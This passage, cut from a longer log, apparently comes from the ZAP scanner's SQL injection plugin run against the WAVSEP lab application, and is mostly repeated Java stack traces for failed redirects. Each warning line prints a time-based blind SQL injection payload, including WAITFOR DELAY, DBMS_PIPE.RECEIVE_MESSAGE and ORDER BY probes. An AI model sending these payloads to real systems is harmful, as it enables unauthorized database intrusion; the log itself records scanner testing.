Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679913 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('SkZk'='SkZk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('SkZk'='SkZk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679913 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'ORLa'='ORLa] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'ORLa'='ORLa at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679914 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679915 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- kzfy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- kzfy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679916 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4016=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(76)||CHR(83)||CHR(111),5) AND (1034=1034] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4016=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(76)||CHR(83)||CHR(111),5) AND (1034=1034 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679917 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(90)||CHR(115)||CHR(98),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(90)||CHR(115)||CHR(98),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679917 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2204=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(103)||CHR(118)||CHR(120),5) AND ('chWW'='chWW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2204=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(103)||CHR(118)||CHR(120),5) AND ('chWW'='chWW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679918 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8274=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(107)||CHR(72)||CHR(76),5) AND 'Vect'='Vect] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8274=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(107)||CHR(72)||CHR(76),5) AND 'Vect'='Vect at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679920 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1059=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(79)||CHR(121)||CHR(75),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1059=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(79)||CHR(121)||CHR(75),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679921 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6967=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(79)||CHR(112)||CHR(65),5)-- NmJx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6967=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(79)||CHR(112)||CHR(65),5)-- NmJx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679924 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679925 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 2640-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 2640-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at 